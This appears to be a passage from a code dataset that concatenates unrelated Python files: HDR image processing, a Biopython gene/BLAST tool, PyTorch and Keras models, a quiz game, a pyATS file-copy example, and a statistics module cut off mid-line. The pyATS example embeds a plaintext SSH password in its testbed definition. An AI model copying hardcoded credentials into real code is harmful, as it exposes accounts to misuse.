\"\n it = iter(seq)\n result = tuple(islice(it, n))\n if len(result) == n:\n yield result\n for elem in it:\n result = result[1:] + (elem,)\n yield result\n\ndef MakeHDR(window,numero):\n images = []\n exp_times = []\n folder1 = 'pelicula_msngf2_hdr_cm1-parallelized/'\n # folder2 = 'pelicula_msngf2_hdr_cm2/'\n print(\"Making windows number %i\"%numero)\n for item in window:\n # print('Reading image %s'%item[-1])\n f = 'pelicula_sun_msngf2/'+item[-1]\n # f = 'pelicula_ima_aug26/'+item[-1]\n im_t = np.flipud(matplotlib.image.imread(f))\n wd,h = im_t.shape[0],im_t.shape[1]\n imgs = np.array(rgb2gray(im_t[int(wd/2)-1500:int(wd/2)+1500,int(h/2)-1500:int(h/2)+1500]),dtype=np.uint8)\n # imgs = np.array(denoise_tv_chambolle(im_gs, weight=0., multichannel=False),dtype=np.uint8)\n images.append(imgs)\n del f,im_t,wd,h,imgs#,im_gs\n exp_times.append(float(item[-2]))\n img_hdr = computeHDR(images,np.log(exp_times))\n img_hdr = np.array((255/np.max(img_hdr))*img_hdr,dtype=np.float64)\n matplotlib.image.imsave(folder1+'%i.jpg'%numero,img_hdr,cmap='gray_r',origin='lower',dpi=900)\n # matplotlib.image.imsave(folder2+'%i.jpg'%idx,img_hdr,cmap='PuOr_r',origin='lower',dpi=900)\n del img_hdr\n\n\nif __name__ == '__main__':\n metadata = np.load('metadata_aug26.npy')\n n = 20\n windows = []\n for each in window(metadata[1:],n):\n windows.append(list(each))\n pool = mp.Pool(processes=12)\n try:\n jobs = [pool.apply_async(MakeHDR, args=(ventana, numero)) for numero,ventana in enumerate(windows)]\n results = [r.get() for r in jobs] # This line actually runs the jobs\n pool.close()\n pool.join()\n # re-raise the rest\n except Exception:\n print(\"Exception in worker:\")\n # traceback.print_exc()\n raise\n # metadata_ch = chunkIt(metadata[1:],n)\n # for idx,chun in enumerate(metadata_ch):\n # images = []\n # exp_times = []\n # print('Making chunk %i'%idx)\n # for item in chun:\n # print('Reading image %s'%item[-1])\n # f = 'pelicula_sun_msngf2/'+item[-1]\n # # f = 'pelicula_ima_aug26/'+item[-1]\n # im_t = np.flipud(matplotlib.image.imread(f))\n # wd,h = im_t.shape[0],im_t.shape[1]\n # imgs = np.array(rgb2gray(im_t[int(wd/2)-1500:int(wd/2)+1500,int(h/2)-1500:int(h/2)+1500]),dtype=np.uint8)\n # # imgs = np.array(denoise_tv_chambolle(im_gs, weight=0., multichannel=False),dtype=np.uint8)\n # images.append(imgs)\n # del f,im_t,wd,h,imgs#,im_gs\n # exp_times.append(float(item[-2]))\n # img_hdr = computeHDR(images,np.log(exp_times))\n # img_hdr = np.array((255/np.max(img_hdr))*img_hdr,dtype=np.float64)\n # matplotlib.image.imsave(folder1+'%i.jpg'%idx,img_hdr,cmap='gray_r',origin='lower',dpi=900)\n # matplotlib.image.imsave(folder2+'%i.jpg'%idx,img_hdr,cmap='PuOr_r',origin='lower',dpi=900)\n # del img_hdr\n # plt.imshow(img_hdr,cmap='viridis',origin='lower')\n # plt.show()\n # n = 21\n # images = []\n # exp_times = []\n # print('Reading images')\n # for item in metadata[1:n]:\n # print('Reading image %s'%item[-1])\n # f = 'pelicula_sun_msngf2/'+item[-1]\n # # f = 'pelicula_ima_aug26/'+item[-1]\n # im_t = np.flipud(matplotlib.image.imread(f))\n # wd,h = im_t.shape[0],im_t.shape[1]\n # imgs = np.array(rgb2gray(im_t[int(wd/2)-1500:int(wd/2)+1500,int(h/2)-1500:int(h/2)+1500]),dtype=np.uint8)\n # # imgs = np.array(denoise_tv_chambolle(im_gs, weight=0., multichannel=False),dtype=np.uint8)\n # images.append(imgs)\n # del f,im_t,wd,h,imgs#,im_gs\n # exp_times.append(float(item[-2]))\n # img_hdr = computeHDR(images,np.log(exp_times))\n # img_hdr = np.array(img_hdr,dtype=np.float64)\n # 
matplotlib.image.imsave('HDR_test_denoise_gnf.jpg',img_hdr,dpi=600)\n # plt.imshow(img_hdr,cmap='viridis',origin='lower')\n # plt.show()","sub_path":"hdr_aug27_multi.py","file_name":"hdr_aug27_multi.py","file_ext":"py","file_size_in_byte":17881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"353516925","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 27 11:04:57 2019\n\n@author: Bia\n\"\"\"\n\n\nimport os\nfrom Bio import SeqIO\nfrom Bio import Entrez\nfrom Bio.Blast import NCBIWWW\nfrom Bio.Blast import NCBIXML\n\n\n\ndef gene(nr):\n if nr == 'NG_046988.1':\n filename = 'E2F1.gb'\n elif nr == 'NG_012306.1':\n filename = 'IRF5.gb'\n else:\n return False\n Entrez.email = \"...@example.com\"\n if not os.path.isfile(filename):\n handle = Entrez.efetch(db=\"nucleotide\", id=nr, rettype='gb', retmode=\"text\") \n save_gene = open(filename,'w') \n save_gene.write(handle.read())\n save_gene.close()\n handle.close() \n record = SeqIO.read(filename,'genbank') \n return record\n\n\ndef get_prot(nr):\n featcds = [ ]\n for i in range(len(gene(nr).features)):\n if gene(nr).features[i].type == \"CDS\":\n featcds.append(i)\n if nr == 'NG_046988.1': #E2F1\n for k in featcds:\n if gene(nr).features[k].qualifiers['product'][0] == 'transcription factor E2F1':\n seq_prot = gene(nr).features[k].qualifiers['translation'][0]\n prot_id = gene(nr).features[k].qualifiers['protein_id'][0]\n proteína = {'Id da proteína':prot_id,'Sequência da proteína':seq_prot}\n elif nr == 'NG_012306.1': #IRF5\n for k in featcds:\n if gene(nr).features[k].qualifiers['product'][0] == 'interferon regulatory factor 5 isoform d':\n seq_prot = gene(nr).features[k].qualifiers['translation'][0]\n prot_id = gene(nr).features[k].qualifiers['protein_id'][0]\n proteína = {'Id da proteína':prot_id,'Sequência da proteína':seq_prot}\n return proteína\n\n\ndef literatura_gene():\n terms = ['IRF5 protein levels significantly lower in non-small cell lung cancer',\n 'Clinical Significance of transcription factor E2F1 in Non-Small Cell Lung Cancer',\n 'E2F1 IRF5 lung cancer']\n ids = []\n for cit in terms:\n Entrez.email = \"...@example.com\"\n handle = Entrez.esearch(db='pubmed',term=cit)\n record = Entrez.read(handle)\n handle.close()\n ids.append(record['IdList'])\n out_handle = Entrez.efetch(db='pubmed', id=str(ids), rettype='abstract', retmode='text')\n out_record = out_handle.read()\n out_handle.close()\n return out_record\n\n\ndef blast(nr):\n if nr == 'NG_046988.1':\n filename = 'E2F1_blast.xml'\n elif nr == 'NG_012306.1':\n filename = 'IRF5_blast.xml'\n if not os.path.isfile(filename):\n my_prot = get_prot(nr)['Sequência da proteína']\n handle = NCBIWWW.qblast('blastp','swissprot',my_prot, \n url_base='https://blast.ncbi.nlm.nih.gov/Blast.cgi', auto_format=None, \n composition_based_statistics=None, db_genetic_code=None, endpoints=None, \n entrez_query='(none)', expect=0.04, filter=None, gapcosts=None, genetic_code=None, \n hitlist_size=15, i_thresh=None, layout=None, lcase_mask=None, matrix_name='BLOSUM62', \n nucl_penalty=None, nucl_reward=None, other_advanced=None, perc_ident=None, \n phi_pattern=None, query_file=None, query_believe_defline=None, query_from=None, \n query_to=None, searchsp_eff=None, service=None, threshold=None, ungapped_alignment=None, \n word_size=None, short_query=None, alignments=10, alignment_view=None, descriptions=10, \n entrez_links_new_window=None, expect_low=None, expect_high=None, format_entrez_query=None, \n format_object=None, 
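# most of the keyword arguments spelled out above simply restate qblast's defaults (None); the meaningful choices in this call are the e-value cutoff (expect=0.04), the hit list sizes (hitlist_size, descriptions, alignments), the BLOSUM62 matrix and the XML output format\n                                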
format_type='XML', ncbi_gi=None, results_file=None, show_overview=None, \n megablast=None, template_type=None, template_length=None)\n save_file = open(filename,'w')\n save_file.write(handle.read())\n save_file.close()\n handle.close() \n result = open(filename)\n records = NCBIXML.parse(result) \n return records\n\n\ndef mega(nr):\n acessions = []\n for blast_record in blast(nr):\n for alignment in blast_record.alignments:\n acessions.append(alignment.title[3:11])\n if nr == 'NG_046988.1':\n filename = 'E2F1_homologas.fasta'\n elif nr == 'NG_012306.1':\n filename = 'IRF5_homologas.fasta'\n else:\n return False\n Entrez.email = \"...@example.com\"\n if not os.path.isfile(filename):\n handle = Entrez.efetch(db=\"protein\", id=acessions, rettype='fasta', retmode=\"text\") \n save_gene = open(filename,'w') \n save_gene.write(handle.read())\n save_gene.close()\n handle.close() \n record = SeqIO.parse(filename,'fasta') \n return record #ficheiro fasta com as sequências homólogas do nosso gene para utilizar no MEGA\n\n\ndef test():\n while True: \n g = input(\"\"\"\n [1] Analisar o gene E2F1\n [2] Analisar o gene IRF5\n [3] Fechar o programa\n \n Escolha uma opção: \"\"\")\n if g == '1':\n nr = 'NG_046988.1'\n elif g == '2':\n nr = 'NG_012306.1'\n elif g == '3':\n print(\"\"\"\n O programa acabou! Obrigada!\"\"\")\n break\n else:\n print(\"\"\"\n Tente outra vez! Escolha apenas 1, 2 ou 3!\"\"\")\n test()\n while True:\n menu = input(\"\"\"\n [1] Análise de literatura\n [2] Análise da sequência e das features presentes no NCBI\n [3] Análise de homologias por BLAST\n [4] Seleciona outro gene para analisar\n \n Escolha uma opção: \"\"\")\n if menu == \"1\":\n print(' ')\n print('Artigos sobre os genes: '+'\\n',literatura_gene())\n elif menu == \"2\":\n while True:\n escolha = input(\"\"\"\n [A] Obter os ficheiros correspondentes ao gene\n [B] Verificar as anotações correspondentes ao gene \n [C] Verificar e analisar a informação da lista de features e seus qualifiers\n [E] Voltar ao menu anterior\n \n Escolha uma opção: \"\"\")\n if escolha in 'Aa':\n print('\\n'+'Sequência propriamente dita:'+'\\n',gene(nr).seq +'\\n')\n print('Tamanho da respetiva sequência de DNA:',len(gene(nr).seq))\n print('\\n'+'Identificador da sequência:',gene(nr).id + '\\n')\n print('Nome da sequência:',gene(nr).name + '\\n')\n print('Descrição:',gene(nr).description + '\\n')\n print('Número de anotações:',len(gene(nr).annotations))\n print('\\n'+'Proveniência:',gene(nr).annotations[\"source\"] +'\\n')\n print('Referências a bases de dados externas:',gene(nr).dbxrefs)\n print('\\n'+'Número de features:',len(gene(nr).features))\n elif escolha in 'Bb':\n print(' ')\n for key in gene(nr).annotations:\n print('\\n'+key + ':',gene(nr).annotations[key])\n elif escolha in 'Cc':\n print(' ')\n i=0\n for feat in gene(nr).features:\n i+=1\n print('\\n'+'***FEATURE '+str(i)+'***'+'\\n')\n print('Type:',feat.type)\n print('\\n'+'Location:',feat.location)\n print('\\n'+'Subsequência correspondente à feature:',feat.extract(gene(nr).seq)+'\\n')\n print('Qualifiers da feature: '+'\\n')\n for key in feat.qualifiers:\n print(key+': ')\n for value in feat.qualifiers[key]:\n print(value+'\\n')\n r = input(\"\"\"Obter apenas as sequências codificantes (CDS) e a proteína respetivamente codificada \n \n [S] Sim\n [N] Não\n \n Escolha uma opção: \"\"\")\n if r in 'Ss':\n for feat in gene(nr).features:\n if feat.type == \"CDS\":\n print('\\n'+'***FEATURE CDS***')\n print('\\n'+'Location: ',feat.location)\n print('\\n'+'Sub-sequência afetada pela 
feature: ',feat.extract(gene(nr).seq))\n print('\\n'+'Proteína codificada: ', \n feat.qualifiers['product'][0]+'\\n',\n '\\n'+'Sequência da proteína: ',\n feat.qualifiers['translation'][0]+'\\n',\n '\\n'+'Id da proteína: ', \n feat.qualifiers['protein_id'][0]+'\\n')\n elif escolha in \"Ee\":\n print('''\n Voltou ao menu anterior.''')\n break\n else:\n print('''\n Erro! Não selecionou corretamente nenhuma das opções. Tente novamente.''')\n elif menu == \"3\":\n print('\\n'+'BLAST RESULTS...loading...'+'\\n')\n i = 0\n for blast_record in blast(nr):\n for alignment in blast_record.alignments:\n for hsp in alignment.hsps:\n i += 1\n print('\\n'+'**** ALIGNMENT '+str(i)+' ****'+'\\n')\n print('sequence description:', alignment.title)\n print('\\n'+'length:', alignment.length)\n print('\\n'+'e-value:', hsp.expect)\n print('\\n'+'score:',hsp.score)\n print('\\n'+'percent identity (%):',(hsp.identities)*100/len(hsp.query))\n print('\\n'+'query: '+hsp.query[0:75] + \"...\")\n print('match: '+hsp.match[0:75] + \"...\")\n print('sbjct: '+hsp.sbjct[0:75] + \"...\"+'\\n')\n mega(nr)\n elif menu == \"4\":\n print('''\n Escolha outro gene a analisar.''')\n \n break\n else:\n print('''\n Erro! Não selecionou corretamente nenhuma das opções. Tente novamente.''')\n \n \nif __name__ == \"__main__\":\n test()\n \n ","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":10477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"81754417","text":"\"\"\"Module containing the embedders.\"\"\"\r\n\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\n\r\nfrom scipy.stats import truncnorm\r\nfrom torch.nn.parameter import Parameter\r\n\r\nfrom utils.helpers import get_device\r\n\r\n\r\nclass Embedder(nn.Module):\r\n def __init__(self, n_tokens, latent_dim, dt=1.0, weighted=True):\r\n \"\"\"Token embedder.\r\n\r\n Parameters\r\n ----------\r\n n_tokens: int\r\n Number of tokens in vocabulary\r\n\r\n latent_dim: int\r\n Dimensionality of latent embedding.\r\n\r\n dt: float\r\n Time increment between sequence steps.\r\n\r\n weighted: bool\r\n Whether or not to add embedding weights.\r\n \"\"\"\r\n super(Embedder, self).__init__()\r\n\r\n self.n_tokens = n_tokens\r\n self.latent_dim = latent_dim\r\n self.dt = dt\r\n self.weighted = weighted\r\n\r\n self.device = get_device()\r\n\r\n self.embedX = Embedding(n_tokens+1, latent_dim, padding_idx=0)\r\n if self.weighted:\r\n self.embedW = Embedding(n_tokens+1, 1)\r\n self.softmax = nn.Softmax(dim=1)\r\n\r\n def forward(self, X):\r\n T = X[:, :, 0]\r\n X = X[:, :, 1].long()\r\n\r\n # Remove excess in time dimension\r\n t_max = T.max()\r\n n = (T < t_max).sum(dim=1).max()\r\n T = T[:, :n]\r\n X = X[:, :n]\r\n\r\n # Embed tokens\r\n embedded = self.embedX(X)\r\n\r\n # Extract token weights (and keep them positive)\r\n if self.weighted:\r\n w = self.embedW(X)\r\n w = torch.exp(w)\r\n\r\n # Step through sequence\r\n output = []\r\n for t in torch.arange(\r\n 0, t_max, self.dt, dtype=torch.float32).to(self.device):\r\n t_idx = ((t <= T) & (T < t+1)).float().unsqueeze(2)\r\n counts = t_idx.sum(dim=1, keepdim=True)\r\n\r\n if self.weighted:\r\n w_t = t_idx * w\r\n X_t = w_t * embedded\r\n else:\r\n X_t = t_idx * embedded\r\n\r\n X_t_avg = X_t.sum(dim=1, keepdim=True) / (counts + 1e-6)\r\n output += [X_t_avg]\r\n\r\n output = torch.cat(output, dim=1)\r\n\r\n return output\r\n\r\n\r\n# HELPERS\r\nclass Embedding(nn.Module):\r\n def __init__(self, n_tokens, latent_dim,\r\n 
padding_idx=None, init='truncnorm'):\r\n super(Embedding, self).__init__()\r\n self.n_tokens = n_tokens\r\n self.latent_dim = latent_dim\r\n if padding_idx is not None:\r\n if padding_idx > 0:\r\n assert padding_idx < self.n_tokens, \\\r\n 'padding_idx must be within n_tokens'\r\n elif padding_idx < 0:\r\n assert padding_idx >= -self.n_tokens, \\\r\n 'padding_idx must be within n_tokens'\r\n self.padding_idx = padding_idx\r\n self.init = init\r\n\r\n self.reset_parameters()\r\n\r\n def reset_parameters(self):\r\n with torch.no_grad():\r\n if self.init == 'truncnorm':\r\n t = 1. / (self.n_tokens ** (1 / 2))\r\n weights = truncnorm.rvs(\r\n -t, t, size=[self.n_tokens, self.latent_dim])\r\n self.weights = Parameter(torch.tensor(weights).float())\r\n elif self.init == 'zeros':\r\n self.weights = Parameter(\r\n torch.Tensor(self.n_tokens, self.latent_dim))\r\n self.weights.fill_(1.0)\r\n\r\n if self.padding_idx is not None:\r\n with torch.no_grad():\r\n self.weights[self.padding_idx].zero_()\r\n\r\n def forward(self, x):\r\n x = F.embedding(x, self.weights, padding_idx=self.padding_idx)\r\n\r\n return x\r\n","sub_path":"flexehr/models/embedders.py","file_name":"embedders.py","file_ext":"py","file_size_in_byte":3675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"312728343","text":"import csv\r\nimport matplotlib.pyplot as plt\r\nimport tensorflow as tf\r\nimport numpy as np\r\nfrom scipy.spatial.distance import cdist\r\nfrom tensorflow.python.keras.models import Sequential\r\nfrom tensorflow.python.keras.layers import Dense, GRU, Embedding, Flatten\r\nfrom tensorflow.python.keras.optimizers import Adam\r\n#from tensorflow.python.keras.utils import to_categorical\r\nfrom tensorflow.python.keras.preprocessing.text import Tokenizer\r\nfrom tensorflow.python.keras.preprocessing.sequence import pad_sequences\r\nfrom tensorflow.python.keras import backend as K\r\n\r\n\r\ntf.compat.v1.disable_eager_execution()\r\n\r\nx_train_text = []\r\ny_train = []\r\nx_test_text = []\r\ny_test = []\r\n\r\nwith open('combinetrainset.csv') as csvfile:\r\n readCSV = csv.reader(csvfile, delimiter=',')\r\n for row in readCSV: \r\n x_train_text.append(row[0])\r\n y_train.append(float(row[3]))\r\n\r\nwith open('combinetestset.csv') as csvfile:\r\n readCSV = csv.reader(csvfile, delimiter=',')\r\n for row in readCSV:\r\n x_test_text.append(row[0])\r\n y_test.append(float(row[3]))\r\n \r\none_hot_labels = tf.keras.utils.to_categorical(y_train, num_classes=3) # remember to change num classes to reflect number of error types vhl\r\ntwo_hot_labels = tf.keras.utils.to_categorical(y_test, num_classes=3) # num classes is number of errors\r\ndata_text = x_train_text + x_test_text\r\n\r\nnum_words=10000\r\ntokenizer = Tokenizer(num_words=num_words)\r\n\r\ntokenizer.fit_on_texts(data_text)\r\n\r\nx_train_tokens = tokenizer.texts_to_sequences(x_train_text)\r\nx_test_tokens = tokenizer.texts_to_sequences(x_test_text)\r\n\r\nnum_tokens = [len(tokens) for tokens in x_train_tokens + x_test_tokens]\r\nnum_tokens = np.array(num_tokens)\r\n\r\nmax_tokens = np.max(num_tokens)\r\nmax_tokens = int(max_tokens)\r\n\r\npad = 'pre'\r\n\r\nx_train_pad = pad_sequences(x_train_tokens, maxlen=max_tokens,\r\n padding=pad, truncating=pad)\r\nx_test_pad = pad_sequences(x_test_tokens, maxlen=max_tokens,\r\n padding=pad, truncating=pad)\r\n\r\n\r\nidx = tokenizer.word_index\r\ninverse_map = dict(zip(idx.values(), idx.keys()))\r\n\r\ndef tokens_to_string(tokens):\r\n # Map from tokens back to words.\r\n 
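# Token index 0 is reserved by the Tokenizer for padding (pad_sequences fills with zeros), so padded positions are skipped before joining.\r\n    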
words = [inverse_map[token] for token in tokens if token != 0]\r\n \r\n # Concatenate all words.\r\n text = \" \".join(words)\r\n\r\n return text\r\n\r\nmodel = Sequential()\r\n\r\n\r\n\r\nembedding_size = 8\r\n\r\nmodel.add(Embedding(input_dim=num_words,\r\n output_dim=embedding_size,\r\n input_length=max_tokens,\r\n name='layer_embedding'))\r\n\r\nmodel.add(GRU(units=16, return_sequences=True))\r\nmodel.add(GRU(units=8, return_sequences=True))\r\nmodel.add(GRU(units=4))\r\n\r\n# the first parameter corresponds to number of target\r\nmodel.add(Dense(3, activation='softmax')) # changed ativation to softmax and first parameter from one to 2 vhl\r\noptimizer = Adam(lr=1e-3)\r\n\r\nmodel.compile(loss='categorical_crossentropy',\r\n optimizer=optimizer,\r\n metrics=['accuracy']) # changed loss to categorical_crossentropy\r\n\r\n#model.fit(x_train_pad, y_train, validation_split=0.05, epochs=3, batch_size=32)\r\nmodel.fit(x_train_pad, one_hot_labels, validation_split=0.05, epochs=3, batch_size=32) # replaced y_train with one_hot_labels \r\nresult = model.evaluate(x_test_pad, np.array(two_hot_labels)) # replaced y_test with two_hot_abels\r\n\r\nprint(\"Accuracy: {0:.2%}\".format(result[1]))\r\nprint(\"-----------------------------------------------------\")\r\n\r\ny_pred = model.predict(x=x_test_pad[0:1000])\r\ny_pred = y_pred.T[0]\r\n\r\ncls_pred = np.array([1.0 if p>0.5 else 0.0 for p in y_pred])\r\ncls_true = np.array(y_test[0:1000])\r\n\r\nincorrect = np.where(cls_pred != cls_true)\r\nidx = incorrect[0]\r\nprint(idx)\r\n \r\n\r\n\r\n\r\n\r\n \r\n","sub_path":"error-detection-neural-nets-master/Neural Network.py","file_name":"Neural Network.py","file_ext":"py","file_size_in_byte":3753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"219122365","text":"from PIL import Image\n\n# creating an empty list where we going to store all the personality choices\npersonality_choices = []\n# asking a user for her/his name and greeting\nname = input(\"What is your name? (please print your name):\\n\")\nprint(\"Hi {}! Nice to meet you!\".format(name))\n# asking if the user wants to play\nanswer = input(\"This small Python program will show you \\nwhat tree you could be according to your features.\\nWould \"\n \"you like to play?\\n(print yes/no)\\n\")\n\n\ndef bye():\n # this function will be used if the user doesn't want to play\n # it will finish the game and show a funny picture of the baobab\n print(\"Oh, {}, you are such a baobab!\".format(name))\n image = Image.open('baobab.jpg')\n image.show()\n\n\ndef yes_or_no_answer_only():\n # this function called if user put anything else as input when he/she needs to answer \"yes\" or \"no\" only\n # it will ask if the user wants to try again and if yes, redirect to the first answer\n print(\"Please answer 'yes' or 'no'.\")\n try_again = str(input(\"Would you like to try again?\\n\"))\n game_start_question1()\n\n\ndef value_error_numbers():\n # this function is called if the user put str or number larger than 3 as answer and asks if the user wants to try\n # again. If the answer is \"yes\" it redirect to the first question and to \"buy\" function if \"no\"\n ve_answer = str(input(\"You should've choose a number 1-3 to the previous question.\\nWould you like to try again? 
(\"\n \"print yes/no)\"))\n if ve_answer == \"yes\":\n game_start_question1()\n else:\n bye()\n\n\ndef game_start_question1():\n # The start of the game and the first question about the height of the person\n # if the user put wrong number, out of range or a str as the answer, this function redirects to value_error_numbers\n print(\"Okay, let's start!\")\n print(\"Please choose (a number) which of those suits you best: \")\n try:\n height = int(input(\"I am: \\n1.Tall \\n2.Average height \\n3.Small\\n\"))\n if height == 1 or height == 2 or height == 3:\n personality_choices.append(height)\n else:\n value_error_numbers()\n except ValueError:\n value_error_numbers()\n\n\ndef question2():\n print(\"Which quality suits you personality better? (choose one number only): \")\n try:\n personality = int(input(\"1.Tough\\n2.Easygoing\\n3.Both, depends on situation.\\n\"))\n personality_choices.append(personality)\n question3()\n except ValueError:\n value_error_numbers()\n\n\ndef question3():\n print(\"Which season is you favorite? (choose one number only):\\n\")\n try:\n weather_choice = int(input(\"1.Winter\\n2.Spring\\n3.Summer\\n4.Autumn\\n\"))\n personality_choices.append(weather_choice)\n question4()\n except ValueError:\n value_error_numbers()\n\n\ndef question4():\n print(\"What is the length of your hair? (choose one number):\\n\")\n try:\n haircut = int(input(\"1.Bold\\n2.Short hair\\n3.Shoulder-length\\n4.Long\\n\"))\n personality_choices.append(haircut)\n print(personality_choices)\n except ValueError:\n value_error_numbers()\n\n\nif answer.lower() == \"yes\":\n game_start_question1()\n question2()\n\nelif answer.lower() == \"no\":\n bye()\nelse:\n yes_or_no_answer_only()\n\n\n\n\n\n\n\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"168492544","text":"from ats.topology import loader\nfrom ats import topology\nfrom ats.utils.fileutils import FileUtils\n\n# Transferring a single file to or from a remote server\n\n\ntb = loader.load(\"testbed.yaml\")\n\n# Instanciate a filetransferutils instance for the device corresponding\n# to the device specific OS\nthis_device = FileUtils.from_device(tb.devices['my_device'])\n\n# copy from remote to local machine\nthis_device.copyfile(source='scp://remote_server:/tmp/demo.txt',\n destination='/Users/vkozin/Downloads/',\n timeout_seconds=15)\n\n# copy from local to remote machine\nthis_device.copyfile(source='/Users/vkozin/Downloads/Task_1.docx',\n destination='scp://remote_server:/tmp/',\n timeout_seconds=15)\n\n# loading testbed immediately\ntb = topology.loader.load('''\ndevices:\n remote_device:\n os: 'linux'\n tacacs:\n username: vkozin\n passwords:\n linux: '159753852'\n connections:\n linux:\n protocol: ssh\n ip: 192.168.242.44\n type: 'linux'\n''')\n\n# input data in remote file\nstring_configuration = 'data for script'\n\ndevice = tb.devices['remote_device']\n\ndevice.connect()\ndevice.execute('cd /tmp')\ndevice.execute(\"echo '{}' > demo.txt\".format(string_configuration))\n","sub_path":"case_3/data_copy_example.py","file_name":"data_copy_example.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"558055476","text":"import random\nimport os\n\ndata_dir = \"/home-hd-1/gpu/Workspace/Datas/dataset/Celeb-DF-v2/\"\ntest_file_list_path = os.path.join(data_dir, 'List_of_testing_videos.txt')\ndomain_label = 
1\nwith open(test_file_list_path) as f:\n lines = f.readlines()\n test_fn = {}\n for line in lines:\n label, v_path = line.split(' ')\n v_path = v_path[:-1]\n fn = os.path.basename(v_path).split('.')[0]\n dirn = os.path.dirname(v_path)\n if dirn not in test_fn:\n test_fn[dirn] = [fn]\n else:\n test_fn[dirn].append(fn)\nimg_lists = {}\nfor video_dir in test_fn.keys():\n test_list = test_fn[video_dir]\n train_img_path_list = []\n test_img_path_list = []\n faces_dir = os.path.join(data_dir, video_dir + '_faces')\n for img_dir in os.listdir(faces_dir):\n if img_dir in test_list:\n img_path = os.path.join(faces_dir, img_dir)\n for img_fn in os.listdir(img_path):\n test_img_path_list.append(os.path.join(img_path, img_fn))\n else:\n img_path = os.path.join(faces_dir, img_dir)\n for img_fn in os.listdir(img_path):\n train_img_path_list.append(os.path.join(img_path, img_fn))\n img_lists[video_dir] = {'train': train_img_path_list, 'test': test_img_path_list}\n\ntrain_str_list = []\ntest_str_list = []\n\nfor k in img_lists:\n label = 1\n if 'real' in k:\n label = 0\n for ke in img_lists[k]:\n print('{}_{}: {}'.format(k, ke, len(img_lists[k][ke])))\n output_path = os.path.join(data_dir, '{}_{}.txt'.format(k, ke))\n output_str = ''\n for p in img_lists[k][ke]:\n tmp_str = '{},{},{}\\n'.format(p, label, domain_label)\n output_str += tmp_str\n if ke == 'train':\n train_str_list.append(tmp_str)\n else:\n test_str_list.append(tmp_str)\n with open(output_path, 'w', encoding='utf-8') as f:\n f.write(output_str)\ntrain_file_path = os.path.join(data_dir, 'train.txt')\ntest_file_path = os.path.join(data_dir, 'test.txt')\nprint('train: {}'.format(len(train_str_list)))\nprint('test: {}'.format(len(test_str_list)))\nwith open(train_file_path, 'w', encoding='utf-8') as f:\n f.writelines(train_str_list)\nwith open(test_file_path, 'w', encoding='utf-8') as f:\n f.writelines(test_str_list)\n","sub_path":"scripts/handle_celeb.py","file_name":"handle_celeb.py","file_ext":"py","file_size_in_byte":2337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"364114724","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 25 13:25:41 2013\n\n@author: ed203246\n\"\"\"\nimport numpy as np\nimport scipy\nfrom sklearn.preprocessing import scale\nfrom scipy import stats\n\nclass MUPairwiseCorr:\n \"\"\"Mass-univariate pairwise correlations. Given two arrays X [n_samples x p]\n and Y [n_samples x q]. Fit p x q independent linear models. 
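Because fit() standardizes the columns of X and Y, each entry of Corr_\n    is the Pearson correlation between one column of X and one column of Y. 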
Prediction\n    and stats return [p x q] array.\n\n\n    Example\n    -------\n    >>> import numpy as np\n    >>> from mulm import MUPairwiseCorr\n    >>> X = np.random.randn(10, 5)\n    >>> Y = np.random.randn(10, 3)\n    >>> corr = MUPairwiseCorr()\n    >>> corr.fit(X, Y)\n    \n    >>> f, p = corr.stats_f(X, Y)\n    >>> print(f.shape)\n    (5, 3)\n    \"\"\"\n    def __init__(self, **kwargs):\n        pass\n\n    def fit(self, X, Y):\n        Xs = scale(X, copy=True)\n        Ys = scale(Y, copy=True)\n        self.n_samples = X.shape[0]\n        self.Corr_ = np.dot(Xs.T, Ys) / self.n_samples\n        return self\n\n    def predict(self, X):\n        pass\n\n    def stats_f(self, pval=True):\n        R2 = self.Corr_ ** 2\n        df_res = self.n_samples - 2\n        f_stats = R2 * df_res / (1 - R2)\n        if not pval:\n            return (f_stats, None)\n        else:\n            p_vals = stats.f.sf(f_stats, 1, df_res)\n            return f_stats, p_vals\n\nclass MUOLS:\n    \"\"\"Mass-univariate linear modeling based Ordinary Least Squares.\n    Given two arrays X (n_samples, p) and Y (n_samples, q).\n    Fit q independent linear models, i.e., for all y in Y fit: lm(y ~ X)\n\n    Example\n    -------\n    \"\"\"\n\n    def _block_slices(self, dim_size, block_size):\n        \"\"\"Generator that yields slice objects for indexing into\n        sequential blocks of an array along a particular axis\n        \"\"\"\n        count = 0\n        while True:\n            yield slice(count, count + block_size, 1)\n            count += block_size\n            if count >= dim_size:\n                # PEP 479: raising StopIteration inside a generator is a\n                # RuntimeError on Python 3.7+, so end the generator with return\n                return\n\n    def __init__(self, Y, X):\n        self.coef = None\n        if X.shape[0] != Y.shape[0]:\n            raise ValueError('matrices are not aligned')\n        self.X = X  # TODO PERFORM BASIC CHECK ARRAY\n        self.Y = Y  # TODO PERFORM BASIC CHECK ARRAY\n\n    def fit(self, block=False, max_elements=2 ** 27):\n        \"\"\"Use block=True for huge matrices Y.\n        Operations block by block to optimize time and memory.\n        max_elements: block dimension (2**27 8-byte elements correspond to 1 GB)\n        \"\"\"\n        self.block = block\n        self.max_elements = max_elements\n        # scipy.linalg.pinv2 was removed from SciPy; pinv computes the same\n        # pseudo-inverse\n        self.pinv = scipy.linalg.pinv(self.X)\n        n, p = self.Y.shape\n        q = self.X.shape[1]\n        if self.block:\n            if self.max_elements < n:\n                raise ValueError('the maximum number of elements is too small')\n            max_cols = int(self.max_elements / n)\n        else:\n            max_cols = p\n        self.coef = np.zeros((q, 